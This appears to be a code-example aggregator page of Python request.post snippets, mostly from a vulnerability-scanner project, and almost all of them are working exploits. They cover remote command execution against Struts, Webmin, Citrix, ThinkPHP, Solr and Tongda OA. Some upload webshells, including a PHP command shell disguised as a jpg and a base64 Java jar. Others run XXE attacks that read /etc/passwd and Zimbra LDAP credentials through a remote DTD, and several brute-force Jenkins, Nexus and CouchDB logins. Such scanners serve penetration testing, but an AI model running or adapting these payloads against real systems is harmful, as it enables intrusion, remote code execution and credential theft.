Python post Examples, app.lib.utils.request.request.post Python Examples

Example #1

0

Show file

 def run(self):
     try:
         if not self.url.startswith("http") and not self.url.startswith(
                 "https"):
             self.url = "http://" + self.url
         vuln_url = self.url + "/password_change.cgi"
         check_req = request.post(url=vuln_url,
                                  headers=self.headers,
                                  data=self.check_payload)
         if check_req.status_code == 200 and " " in check_req.text and self.capta in check_req.text:
             cmd_req = request.post(url=vuln_url,
                                    headers=self.headers,
                                    data=self.cmd_payload)
             pattern = re.compile(
                 r"<center><h3>Failed to change password : The current password is incorrect(.*)</h3></center>",
                 re.DOTALL)
             cmd_result = pattern.findall(cmd_req.text)[0]
             print("存在CVE-2019-15107 任意代码执行漏洞,执行whoami命令结果是:", cmd_result)
             return True
         else:
             print("不存在CVE-2019-15107 任意代码执行漏洞")
             return False
     except Exception as e:
         print(e)
         return False
         pass

Example #2

0

Show file

 def run(self):
     if not self.url.startswith("http") and not self.url.startswith(
             "https"):
         self.url = "http://" + self.url
     if '.action' not in self.url:
         self.url = self.url + '/integration/saveGangster.action'
     try:
         check_req = request.post(self.url,
                                  headers=self.headers,
                                  data=self.check_data)
         if self.capta in check_req.text:
             cmd_req = request.post(self.url,
                                    headers=self.headers,
                                    data=self.cmd_data)
             cmd_str = re.sub('\n', '', cmd_req.text)
             result = re.findall('Gangster (.*?) added successfully',
                                 cmd_str)
             print('存在S2-048漏洞,执行whoami命令成功，其结果为:', result)
             return True
         else:
             print('不存在S2-048漏洞')
             return False
     except Exception as e:
         print(e)
         return False
     finally:
         pass

Example #3

0

Show file

 def run(self):
     if not self.url.startswith("http") and not self.url.startswith(
             "https"):
         self.url = "http://" + self.url
     try:
         check_req = request.post(self.url,
                                  headers=self.headers,
                                  data=self.check_payload)
         hostname = urlparse(self.url).hostname
         port = urlparse(self.url).port
         url = 'http://' + str(hostname) + ':' + str(port)
         check_req1 = request.get(url + '/check.txt', headers=self.headers)
         if check_req1.status_code == 200 and self.capta in check_req1.text:
             cmd_req = request.post(self.url,
                                    headers=self.headers,
                                    data=self.cmd_payload)
             cmd_req1 = request.get(url + '/cmd.txt', headers=self.headers)
             print('存在S2-052漏洞,执行whoami的结果为:', cmd_req1.text)
             return True
         else:
             return False
     except Exception as e:
         print(e)
         return False
     finally:
         pass

Example #4

0

Show file

 def run(self):
     if not self.url.startswith("http") and not self.url.startswith(
             "https"):
         self.url = "http://" + self.url
     try:
         check_req = request.post(self.url,
                                  headers=self.headers,
                                  data=self.check_data)
         check_pattern = re.compile('<.*?name="password" value="(.*?)" ')
         check_result = check_pattern.findall(check_req.text)
         if check_result[0] == '80147':
             print('存在S2-001漏洞,执行id命令结果为:\n')
             cmd_req = request.post(self.url,
                                    headers=self.headers,
                                    data=self.cmd_data)
             print(cmd_req.text)
             return True
         else:
             print('不存在S2-001漏洞')
             return True
     except Exception as e:
         print(e)
         return False
     finally:
         pass

Example #5

0

Show file

 def run(self):
     if not self.url.startswith("http") and not self.url.startswith(
             "https"):
         self.url = "http://" + self.url
     if '.action' not in self.url:
         self.url = self.url + '/hello.action'
     try:
         check_req = request.post(self.url,
                                  headers=self.headers,
                                  data=self.check_payload)
         print()
         if check_req.status_code == 200:
             if self.check_count(check_req.text, 'OS:Linux') == 2:
                 cmd_req = request.post(self.url,
                                        headers=self.headers,
                                        data=self.cmd_payload)
                 cmd_str = re.sub('\n', '', cmd_req.text)
                 result = re.findall('<p>Your url:(.*?)</p>', cmd_str)
                 print('存在S2-053漏洞,OS为Linux,执行whoami命令成功，其结果为:', result)
                 return True
             if self.check_count(check_req.text, 'OS:Windows') == 2:
                 cmd_req = request.post(self.url,
                                        headers=self.headers,
                                        data=self.cmd_payload)
                 cmd_str = re.sub('\n', '', cmd_req.text)
                 result = re.findall('<p>Your url:(.*?)</p>', cmd_str)
                 print('存在S2-053漏洞,OS为Windows,执行whoami命令成功，其结果为:', result)
                 return True
         else:
             return False
     except Exception as e:
         print(e)
         return False
     finally:
         pass

Example #6

0

Show file

 def run(self):
     try:
         if not self.url.startswith("http") and not self.url.startswith(
                 "https"):
             self.url = "http://" + self.url
         data_req = request.post(self.url + '/website/blog/',
                                 data=json.dumps(self.data_payload),
                                 headers=self.headers)
         check_req = request.post(self.url + '/_search?pretty',
                                  data=json.dumps(self.check_payload),
                                  headers=self.headers)
         if check_req.status_code == 200 and self.capta in json.loads(
                 check_req.text)["hits"]["hits"][0]["fields"]["lupin"][0]:
             print('存在CVE-2015-1427漏洞')
             cmd_req = request.post(self.url + '/_search?pretty',
                                    data=json.dumps(self.cmd_payload),
                                    headers=self.headers)
             print(
                 '执行whoami命令结果为:',
                 json.loads(
                     cmd_req.text)["hits"]["hits"][0]["fields"]["lupin"][0])
             return True
         else:
             print('不存在CVE-2015-1427漏洞')
             return False
     except Exception as e:
         print(e)
         print('不存在CVE-2015-1427漏洞')
         return False
     finally:
         pass

Example #7

0

Show file

File: Jenkins_Weakpwd.py Project: yougar0/linbing

 def run(self):
     if not self.url.startswith("http") and not self.url.startswith(
             "https"):
         self.url = "http://" + self.url
     url = self.url + "/j_acegi_security_check"
     for user in open('app/username.txt', 'r',
                      encoding='utf-8').readlines():
         user = user.strip()
         for pwd in open('app/password.txt', 'r',
                         encoding='utf-8').readlines():
             if pwd != '':
                 pwd = pwd.strip()
             data = {
                 'j_username': user,
                 'j_password': pwd,
                 'from': '',
                 'Submit': 'Sign in'
             }
             try:
                 req = request.post(url, headers=self.headers, data=data)
                 if req.status_code == 302 and 'ACEGI_SECURITY_HASHED' not in req.headers[
                         'Set-Cookie']:
                     result = "user: %s pwd: %s" % (user, pwd)
                     print('存在Jenkins弱口令漏洞,弱口令为', result)
                     return True
             except Exception as e:
                 print(e)
             finally:
                 pass
     print('不存在Jenkins弱口令漏洞')
     return False

Example #8

0

Show file

File: Solr_Rce.py Project: yougar0/linbing

    def update_queryresponsewriter(self, core_name_url):
        headers = {
            'User-Agent':
            'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0',
            'Content-Type': 'application/json'
        }
        payload = '''
        {
        "update-queryresponsewriter": {

            "startup": "lazy",
            "name": "velocity",
            "class": "solr.VelocityResponseWriter",
            "template.base.dir": "",
            "solr.resource.loader.enabled": "true",
            "params.resource.loader.enabled": "true"
        }
        }'''
        try:
            req = request.post(core_name_url, headers=headers, data=payload)
            if req.status_code == 200 and 'responseHeader' in req.text:
                exp_url = core_name_url[:-7]
                self.send_exp(exp_url)
            else:
                print("不存在Solr远程代码执行漏洞")
        except Exception as e:
            print(e)
            print("不存在Solr远程代码执行漏洞")
        finally:
            pass

Example #9

0

Show file

 def run(self):
     if not self.url.startswith("http") and not self.url.startswith(
             "https"):
         self.url = "http://" + self.url
     try:
         check_req = request.get(self.url + "/services/AdminService",
                                 headers=self.check_headers,
                                 data=self.check_payload)
         if check_req.status_code == 200 and "processing</Admin>" in check_req.text:
             print("存在Axis漏洞")
             shell__req = request.post(self.url + "/services/RandomService",
                                       data=self.shell_payload,
                                       headers=self.shell_headers)
             cmd_req = request.get(self.url + "../shell.jsp?c=echo%20" +
                                   self.capta,
                                   headers=self.headers)
             if cmd_req.status_code == 200 and self.capta in cmd_req.text:
                 print("上传的jsp文件路径为:", self.url + "../shell.jsp")
         else:
             print("不存在Axis漏洞！")
     except Exception as e:
         print(e)
         return False
     finally:
         pass

Example #10

0

Show file

File: Nexus_Weakpwd.py Project: yougar0/linbing

 def run(self):
     if not self.url.startswith("http") and not self.url.startswith(
             "https"):
         self.url = "http://" + self.url
     url = self.url + "/service/rapture/session"
     for user in open('app/username.txt', 'r',
                      encoding='utf-8').readlines():
         user = user.strip()
         for pwd in open('app/password.txt', 'r',
                         encoding='utf-8').readlines():
             if pwd != '':
                 pwd = pwd.strip()
             data = {
                 'username': base64.b64encode(user.encode()).decode(),
                 'password': base64.b64encode(pwd.encode()).decode()
             }
             try:
                 req = request.post(url, headers=self.headers, data=data)
                 if req.status_code == 204 or req.status_code == 405:
                     result = "user: %s pwd: %s" % (user, pwd)
                     print('存在Nexus弱口令漏洞,弱口令为', result)
                     return True
             except Exception as e:
                 print(e)
             finally:
                 pass
     print('不存在Nexus弱口令漏洞')
     return False

Example #11

0

Show file

File: Upload_Jar.py Project: yougar0/linbing

 def execute_cmd(self, command):
     headers = {
         'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0 Safari/537.36',
         'Content-Type': 'application/json;charset=utf-8',
     }
     jar_hash_name = self.check_jar_exsits()
     data = r'{"entryClass":"Execute","parallelism":null,"programArgs":"\"%s\"","savepointPath":null,"allowNonRestoredState":null}' % command
     if jar_hash_name:
         execute_cmd_url = self.url + '/jars/' + jar_hash_name + '/run?entry-class=Execute&program-args="%s"' % command
     else:
         self.upload_execute_jar()
         jar_hash_name = self.check_jar_exsits()
         if jar_hash_name:
             execute_cmd_url = self.url + '/jars/'+ jar_hash_name + '/run?entry-class=Execute&program-args="%s"' % command
         else:
             return False
     try:
         r1 = request.post(execute_cmd_url, headers = headers, data = data)
         match = re.findall('\|@\|(.*?)\|@\|', r1.text)
         self.delete_exists_jar(jar_hash_name)
         if match:
             if match[0][:-2]:
                 return match[0][:-2]
             else:
                 return "result is blank"
         else:
             print('不存在任意Jar包上传导致远程代码执行漏洞')
             return False
     except Exception as e:
         print(e)
         return False
     finally:
         pass

Example #12

0

Show file

File: CVE_2019_19781.py Project: yougar0/linbing

 def run(self):
     if not self.url.startswith("http") and not self.url.startswith(
             "https"):
         self.url = "http://" + self.url
     try:
         newbm_url = self.url + '/vpn/../vpns/portal/scripts/newbm.pl'
         headers = {
             'User-Agent':
             'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)',
             'Connection': 'close',
             'NSC_USER':
             '******' % self.cdl,
             'NSC_NONCE': 'nsroot'
         }
         payload = "url=http://example.com&title=" + self.cdl + "&desc=[% template.new('BLOCK' = 'print `" + self.cmd + "`') %]"
         req = request.post(url=newbm_url, headers=headers, data=payload)
         if req.status_code == 200 and 'parent.window.ns_reload' in req.content:
             print('存在CVE-2019-19781漏洞,上传的文件为:', newbm_url)
             self.xml_url(url, cdl, cmd)
             return True
         else:
             print('不存在CVE-2019-19781漏洞')
             return False
     except Exception as e:
         print(e)
         print('不存在CVE-2019-19781漏洞')
         return False
     finally:
         pass

Example #13

0

Show file

 def run(self):
     Url_Payload1 = "/bsh.servlet.BshServlet"
     Url_Payload2 = "/weaver/bsh.servlet.BshServlet"
     Url_Payload3 = "/weaveroa/bsh.servlet.BshServlet"
     Url_Payload4 = "/oa/bsh.servlet.BshServlet"
     Data_Payload1 = """bsh.script=exec("whoami");&bsh.servlet.output=raw"""
     Data_Payload2 = """bsh.script=\u0065\u0078\u0065\u0063("whoami");&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw"""
     Data_Payload3 = """bsh.script=eval%00("ex"%2b"ec(bsh.httpServletRequest.getParameter(\\"command\\"))");&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw&command=whoami"""
     for Url_Payload in (Url_Payload1, Url_Payload2, Url_Payload3,
                         Url_Payload4):
         url = self.url + Url_Payload
         for Data_payload in (Data_Payload1, Data_Payload2, Data_Payload3):
             try:
                 http_response = request.post(url,
                                              data=Data_payload,
                                              headers=self.headers)
                 #print http_response.status_code
                 if http_response.status_code == 200:
                     if ";</script>" not in (http_response.content):
                         if "Login.jsp" not in (http_response.content):
                             if "Error" not in (http_response.content):
                                 print("存在E-cologyOA_RCE Vulnerability")
                                 #print("Server Current Username：{0}".format(http_response.content))
                                 return True
             except Exception as e:
                 #print(e)
                 pass
     print("不存在E-cologyOA_RCE Vulnerability")
     return False

Example #14

0

Show file

File: CVE_2020_17496.py Project: yougar0/linbing

    def run(self):
        """
          执行命令

          :param:
          :return True or False
          """
        try:
            if self.check():
                cmd_req = request.post(self.payload_url,
                                       headers=self.headers,
                                       data=self.cmd_payload)
                if cmd_req.status_code == 200:
                    print('存在CVE_2019_16759_Bypass 漏洞,执行whoami命令结果为:',
                          cmd_req.text.strip())
                    return True
                else:
                    return False
            else:
                return False, '不存在Bypass CVE-2019-16759漏洞'
        except Exception as e:
            print(e)
            return False
        finally:
            pass

Example #15

0

Show file

File: S2_007.py Project: yougar0/linbing

    def run(self):
        """
        检测是否存在漏洞

        :param:

        :return str True or False
        """

        try:
            if not self.url.startswith("http") and not self.url.startswith(
                    "https"):
                self.url = "http://" + self.url
            if '.action' not in self.url:
                self.url = self.url + '/user.action'
            check_req = request.post(self.url, data=self.check_payload)
            if self.capta in check_req.text and check_req.status_code == 200:
                return True
            else:
                return False
        except Exception as e:
            print(e)
            return False
        finally:
            pass

Example #16

0

Show file

File: S2_001.py Project: yougar0/linbing

    def run(self):
        """
        检测是否存在漏洞

        :param:

        :return str True or False
        """

        if not self.url.startswith("http") and not self.url.startswith(
                "https"):
            self.url = "http://" + self.url
        try:
            check_req = request.post(self.url,
                                     headers=self.headers,
                                     data=self.check_data)
            check_pattern = re.compile('<.*?name="password" value="(.*?)" ')
            check_result = check_pattern.findall(check_req.text)
            if check_result[0] == '80147':
                return True
            else:
                return False
        except Exception as e:
            print(e)
            return False
        finally:
            pass

Example #17

0

Show file

 def run(self):
     if not self.url.startswith("http") and not self.url.startswith("https"):
         self.url = "http://" + self.url
     data = """<!DOCTYPE xxe [
     <!ELEMENT name ANY >
     <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
      <Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
         <Request>
           <EMailAddress>aaaaa</EMailAddress>
           <AcceptableResponseSchema>&xxe;</AcceptableResponseSchema>
         </Request>
       </Autodiscover>
     """
     try:
         req = request.post(self.url + '/Autodiscover/Autodiscover.xml', headers = self.headers, data = data)
         if 'Error 503 Requested response schema not available' in req.text:
             print('存在CVE-2019-9670 XXE读取漏洞')
             return True
         else:
             print('不存在CVE-2019-9670 XXE读取漏洞')
             return False
     except Exception as e:
         #print(e)
         print('不存在CVE-2019-9670 XXE读取漏洞')
         return False
     finally:
         pass

Example #18

0

Show file

 def run(self):
     if not self.url.startswith("http") and not self.url.startswith(
             "https"):
         self.url = "http://" + self.url
     url = self.url + "/_session"
     for user in open('app/username.txt', 'r',
                      encoding='utf-8').readlines():
         user = user.strip()
         for pwd in open('app/password.txt', 'r',
                         encoding='utf-8').readlines():
             if pwd != '':
                 pwd = pwd.strip()
             data = {'name': user, 'password': pwd}
             try:
                 req = request.post(url, headers=self.headers, data=data)
                 if req.status_code == 200 and 'AuthSession' in req.headers[
                         'Set-Cookie'] and json.loads(
                             req.text)['ok'] == True:
                     result = "user: %s pwd: %s" % (user, pwd)
                     print('存在CouchDB弱口令漏洞,弱口令为', result)
                     return True
             except Exception as e:
                 print(e)
     print('不存在CouchDB弱口令漏洞')
     return False

Example #19

0

Show file

File: S2_016.py Project: yougar0/linbing

    def upload_jspshell(self, url, path):

        webshellpath = "'" + path + '/' + "/test.jsp" + "'"
        Headers = {
            'ACCEPT':
            'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'User-Agent': 'Mozilla/5.0 (compatible; Indy Library)'
        }
        payload = "?redirect:${%23path%3d"
        payload += webshellpath
        payload += ",%23file%3dnew+java.io.File(%23path),%23file.createNewFile(),%23buf%3dnew+char[50000],%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest').getReader().read(%23buf),%23out%3dnew+java.io.BufferedWriter(new+java.io.FileWriter(%23file)),%23str%3dnew+java.lang.String(%23buf),%23out.write(%23str.trim()),%23out.close(),%23stm%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23stm.getWriter().println("
        payload += '"' + path + '/test.jsp' + '+Get Shell!!!"'
        payload += "),%23stm.getWriter().flush(),%23stm.getWriter().close()}"
        url += payload
        try:
            req = request.post(url, data=self.jsp_payload, headers=Headers)
            if req.text.find('<html') == -1:
                print(
                    '上传webshell文件成功,webshell文件路径为:',
                    self.url.split('/')[0] + '//' + self.url.split('/')[2] +
                    '/test.jsp')
            else:
                return 'Fail.....>_<'

        except Exception as e:
            return str(e)

Example #20

0

Show file

File: CVE_2019_7609.py Project: yougar0/linbing

 def run(self):
     if not self.url.startswith("http") and not self.url.startswith("https"):
         self.url = "http://" + self.url
     self.get_kibana_version()
     if self.version == '9.9.9' or not self.version_compare("6.6.1", self.version):
         return False
     headers = {
         'Content-Type': 'application/json;charset=utf-8',
         'Referer': self.url,
         'kbn-version': self.version,
         'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0',
     }
     data = '{"sheet":[".es(*)"],"time":{"from":"now-1m","to":"now","mode":"quick","interval":"auto","timezone":"Asia/Shanghai"}}'
     try:
         r = request.post(self.url + "/api/timelion/run", data = data, headers = headers)
         if r.status_code == 200 and 'application/json' in r.headers.get('content-type', '') and '"seriesList"' in r.text:
             print("存在CVE-2019-7609漏洞")
             #self.reverse_shell('127.0.0.1', '10000')
             return True
         else:
             print("不存在CVE-2019-7609漏洞")
             return False
     except Exception as e:
         print(e)
         return False
     finally:
         pass

Example #21

0

Show file

File: CVE_2020_7980.py Project: imfht/flaskapps

 def run(self):
     try:
         if not self.url.startswith("http") and not self.url.startswith(
                 "https"):
             self.url = "http://" + self.url
         cmd_request = request.post(
             self.url + '/cgi-bin/libagent.cgi?type=J&' +
             str(calendar.timegm(time.gmtime())) + '000',
             json=self.data,
             cookies={
                 'ctr_t': '0',
                 'sid': '123456789'
             })
         if cmd_request.status_code == 200 and self.capta in cmd_request.text:
             result = cmd_request.text.split()[-2].replace('},', '')
             print("存在CVE-2020-7980漏洞,执行结果为:", result)
             return True
         else:
             print("不存在CVE-2020-7980漏洞")
             return False
     except Exception as e:
         print(e)
         return False
     finally:
         pass

Example #22

0

Show file

File: S2_046.py Project: imfht/flaskapps

 def run(self):
     if not self.url.startswith("http") and not self.url.startswith("https"):
         self.url = "http://" + self.url
     try:
         check_req = request.post(self.url, headers = self.headers, data = self.check_data)
         if self.capta in check_req.text:
             cmd_req = request.post(self.url, headers = self.headers, data = self.cmd_data)
             print('存在S2-046漏洞,执行whoami命令成功，结果为：', cmd_req.text)
             return True
         else:
             print('不存在S2-046漏洞!')
             return False
     except Exception as e:
         print(e)
         return False
     finally:
         pass

Example #23

0

Show file

File: CVE_2019_16759.py Project: yougar0/linbing

 def run(self):
     if not self.url.startswith("http") and not self.url.startswith(
             "https"):
         self.url = "http://" + self.url
     check_req = request.post(self.url, data=self.check_data)
     try:
         if check_req.status_code == 200 and self.capta in check_req.text:
             cmd_req = request.post(self.url, data=self.cmd_data)
             print('CVE-2019-16759漏洞,执行whoami命令成功，执行结果为:', cmd_req.text)
             return True
         else:
             return False
     except Exception as e:
         print(e)
         return False
     finally:
         pass

Example #24

0

Show file

 def run(self):
     try:
         name_data = "-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"ATTACHMENT\"; filename=\"f.jpg\"\r\nContent-Type: image/jpeg\r\n\r\n<?php\r\n$command=$_POST['f'];\r\n$wsh = new COM('WScript.shell');\r\n$exec = $wsh->exec(\"cmd /c \".$command);\r\n$stdout = $exec->StdOut();\r\n$stroutput = $stdout->ReadAll();\r\necho $stroutput;\r\n?>\n\r\n-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"P\"\r\n\r\n1\r\n-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"DEST_UID\"\r\n\r\n1222222\r\n-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"UPLOAD_MODE\"\r\n\r\n1\r\n-----------------------------27723940316706158781839860668--\r\n"
         name_result = request.post(self.url + '/ispirit/im/upload.php',
                                    headers=self.headers1,
                                    data=name_data)
         name = "".join(re.findall("2003_(.+?)\|", name_result.text))
         check_data = {
             "json":
             "{\"url\":\"../../../general/../attach/im/2003/%s.f.jpg\"}" %
             (name),
             "f":
             "echo %s" % (self.capta)
         }
         check_result = request.post(self.url +
                                     '/ispirit/interface/gateway.php',
                                     headers=self.headers2,
                                     data=check_data)
         if check_result.status_code == 200 and self.capta in check_result.text:
             print("存在通达OA可执行任意命令漏洞,执行whoami漏洞结果为:")
             cmd_data = {
                 "json":
                 "{\"url\":\"../../../general/../attach/im/2003/%s.f.jpg\"}"
                 % (name),
                 "f":
                 "%s" % "whoami"
             }
             cmd_result = request.post(self.url +
                                       '/ispirit/interface/gateway.php',
                                       headers=self.headers2,
                                       data=cmd_data)
             print(cmd_result.text)
             return True
         else:
             print("不存在通达OA可执行任意命令漏洞")
             return False
     except Exception as e:
         print(e)
         print("不存在通达OA可执行任意命令漏洞")
         return False
     finally:
         pass

Example #25

0

Show file

 def run(self):
     try:
         if not self.url.startswith("http") and not self.url.startswith("https"):
             self.url = "http://" + self.url
         if 'index.php' not in self.url:
             self.url = self.url + '/index.php?s=captcha'
         if 'index.php' in self.url and '/?s=captcha' not in self.url:
             self.url = self.url + '/?s=captcha'
         check_req = request.post(self.url, data = self.check_payload, headers = self.headers)
         if check_req.status_code == 200 and self.capta in check_req.text:
             cmd_req = request.post(self.url, data = self.cmd_payload, headers = self.headers)
             print ('存在ThinkPHP5 5.0.23 远程代码执行漏洞,执行whoami命令成功，执行结果是:', cmd_req.text.split('\n')[0])
             return True
         else:
             print('不存在ThinkPHP5 5.0.23 远程代码执行漏洞')
             return False
     except Exception as e:
         print (e)
         return False
     finally:
         pass

Example #26

0

Show file

 def get_admin_token(self):
     self.headers[
         "Cookie"] = "ZM_ADMIN_AUTH_TOKEN=" + self.low_priv_token + ";"
     self.headers["Host"] = "foo:7071"
     print("[*] Get Admin  Auth Token By SSRF")
     pattern_auth_token = re.compile(r"<authToken>(.*?)</authToken>")
     req = request.post(
         self.url +
         "/service/proxy?target=https://127.0.0.1:7071/service/admin/soap",
         headers=self.headers,
         data=self.auth_body)
     self.admin_token = pattern_auth_token.findall(req.text)[0]

Example #27

0

Show file

File: Upload_Jar.py Project: yougar0/linbing

 def upload_execute_jar(self):
     upload_jar_url = self.url + "/jars/upload"
     file_content = base64.b64decode('UEsDBBQACAgIACJ1bU8AAAAAAAAAAAAAAAAUAAQATUVUQS1JTkYvTUFOSUZFU1QuTUb+ygAA803My0xLLS7RDUstKs7Mz7NSMNQz4OXyTczM03XOSSwutlJwrUhNLi1J5eXi5QIAUEsHCIiKCL8wAAAALgAAAFBLAwQKAAAIAAAidW1PAAAAAAAAAAAAAAAACQAAAE1FVEEtSU5GL1BLAwQUAAgICAAidW1PAAAAAAAAAAAAAAAADQAAAEV4ZWN1dGUuY2xhc3ONVet2E1UU/k4yyUwmQy+TQlsQBdSStqSxiIotIlAKVkJbSa0G8DKZHpPTJjNhLjTVCvoQ/ugT8MsfqCtx0aUPwEOx3Gdo09KGtUzW7H3O3vvbt7PPzPMXz/4FMIlfdbyDyxo+1XBFx1Vc05HCjIbrks+quKHipobPNMzp0PC5hlsqChpu6+jBvCQLGhal6gsVd3QUsaRjAF9qWJb8K0m+lqQkyd0URbin4r6OkzLoN5J/K8l3Or6HpaKswmZIXhKOCC4zxLOjywzKjLvCGXoLwuHzYb3MvSWrXCOJWXBtq7ZseULud4RKUBU+Q6ow2+R2GPBpEtUt4TAcy94rrFoPrXzNcir5YuAJpzItA7AGw/F9qkXPtbnvXwtFbYV75CDeCDZkuENo8m15FQqX6eKaHLuEtesrtJI2h0NIG7ujCQNRyxdty3GiqPps0+aNQLiOr4J86EU39Gx+Q8gyjZ3yJiTSwLsYYQCD6voTjlXnKriBH1AxUIWgJNaFY2AVawxDr6uToe9gCeSPsp/gTQoYy9syTI5k+bJw8n6VkogAws2/zCkVKcqWX5WWNQN1UNtjOQK6oB73H6pSxQMDHnxpH5Dp/asGQjw0sA7KtwlhYAMjBn7ETwyDB9PrJB7fvLJpYBM/G3gEoeKxgV9Qo0x3mvRKaQvlVW5TsMyeqNPoV3uw4Qe8zpCu8IBa1eCenIKRbJch6nb46cAtuOvcm7F8SmAg29VIs10noOmk8Tix3/FM1fKK/EHIHZtPj95lONotLM1ukjeFH/jRXSGzhB9YXiDNR7tOW/8hIUMP1TfnNMKA3HKLCh7cBdPJ7lMQfCjbVSETMUKfX+c1UReBPJKzr2/TgTFXq5Y/z5uUtOJELGHXXNmyuBvKSjoRF8nJXipJq9HgDl2L3P86kL3LrAXu7nRnurim+A25w2m8Te9G+YvRxaILRvQs7fLE6a4hMdYGexqps0STkZBhlKjx0gBjGCeewjnkyIrAbInskiT7y4wVxuLnb5vxv6G0kDCTLahbOLUNrZT8B6lS3NSLJcVMF0uJc8U2jPknuGAemVK20VMye9voa6F/C6rZK0W7mGFFYswOJtdCRuoHSsMU5Ggbx8zBFoamEsOJFoa3kJb8+BMo4wW5OvEH3tjGyVIbb5pvtXBqnJ5o0cLpFs7s1fohjhCN01+BSvUMEr1AdV6EjptI4xbpOXqxhj66kP34DSb+RCbqzR36WEwScoIaGSdEDu/RXpE9wXm8H/l9St4m5dsMv+MDWsXI28IOYg1zFP8jQjwifhEfU5+nCKWQ/TQ9l6IsP/kPUEsHCEEOnKXWAwAA4gYAAFBLAQIUABQACAgIACJ1bU+Iigi/MAAAAC4AAAAUAAQAAAAAAAAAAAAAAAAAAABNRVRBLUlORi9NQU5JRkVTVC5NRv7KAABQSwECCgAKAAAIAAAidW1PAAAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAB2AAAATUVUQS1JTkYvUEsBAhQAFAAICAgAInVtT0EOnKXWAwAA4gYAAA0AAAAAAAAAAAAAAAAAnQAAAEV4ZWN1dGUuY2xhc3NQSwUGAAAAAAMAAwC4AAAArgQAAAAA')
     files = {
         'jarfile': (self.upload_jar_name, file_content, 'application/octet-stream')
         }
     try:
         req = request.post(upload_jar_url, headers = self.headers, files = files)
         return True
     except Exception as e:
         print(e)
         return False

Example #28

0

Show file

    def run(self):
        if not self.url.startswith("http") and not self.url.startswith(
                "https"):
            self.url = "http://" + self.url

        try:
            dtd_url = "https://k8gege.github.io/zimbra.dtd"
            """
            <!ENTITY % file SYSTEM "file:../conf/localconfig.xml">
            <!ENTITY % start "<![CDATA[">
            <!ENTITY % end "]]>">
            <!ENTITY % all "<!ENTITY fileContents '%start;%file;%end;'>">
            """
            xxe_data = r"""<!DOCTYPE Autodiscover [
                    <!ENTITY % dtd SYSTEM "{dtd}">
                    %dtd;
                    %all;
                    ]>
            <Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
                <Request>
                    <EMailAddress>aaaaa</EMailAddress>
                    <AcceptableResponseSchema>&fileContents;</AcceptableResponseSchema>
                </Request>
            </Autodiscover>""".format(dtd=dtd_url)

            req = request.post(self.url + "/Autodiscover/Autodiscover.xml",
                               headers=self.headers,
                               data=xxe_data)
            if 'Error 503 Requested response schema not available' in req.text:
                print('存在CVE-2019-9621 任意代码执行漏洞')
                pattern_name = re.compile(
                    r"&lt;key name=(\"|&quot;)zimbra_user(\"|&quot;)&gt;\n.*?&lt;value&gt;(.*?)&lt;\/value&gt;"
                )
                pattern_password = re.compile(
                    r"&lt;key name=(\"|&quot;)zimbra_ldap_password(\"|&quot;)&gt;\n.*?&lt;value&gt;(.*?)&lt;\/value&gt;"
                )
                self.username = pattern_name.findall(req.text)[0][2]
                self.password = pattern_password.findall(req.text)[0][2]
                self.get_low_token()
                self.get_admin_token()
                self.upload()
                return True
            else:
                print('不存在CVE-2019-9621 任意代码执行漏洞')
                return False
        except Exception as e:
            print(e)
            print('不存在CVE-2019-9621 任意代码执行漏洞')
            return False
        finally:
            pass

Example #29

0

Show file

File: S2_012.py Project: yougar0/linbing

 def run(self):
     try:
         if not self.url.startswith("http") and not self.url.startswith(
                 "https"):
             self.url = "http://" + self.url
         if '.action' not in self.url:
             self.url = self.url + '/user.action'
         check_res = request.post(self.url, data=self.check_data)
         check_str = self.filter(list(check_res.text))
         if check_res.status_code == 200 and len(
                 check_str) < 100 and self.capta in check_str:
             cmd_res = request.post(self.url, data=self.cmd_data)
             cmd_str = self.filter(list(cmd_res.text))
             print('存在S2-012漏洞,执行whoami命令成功，执行结果是:', cmd_str)
             return True
         else:
             #print('不存在S2-012漏洞')
             return False
     except Exception as e:
         print(e)
         return False
     finally:
         pass

Example #30

0

Show file

 def run(self):
     if not self.url.startswith("http") and not self.url.startswith(
             "https"):
         self.url = "http://" + self.url
     config_url = self.url + '/solr/demo/config'
     update_url = self.url + '/solr/demo/update'
     try:
         config_req = request.post(
             config_url,
             headers=self.headers,
             data=self.config_payload,
         )
         update_req = request.post(update_url,
                                   headers=self.headers1,
                                   data=self.update_payload)
         print('存在CVE-2017_12629漏洞')
         return True
     except Exception as e:
         print(e)
         print('不存在CVE-2017_12629漏洞')
         return False
     finally:
         pass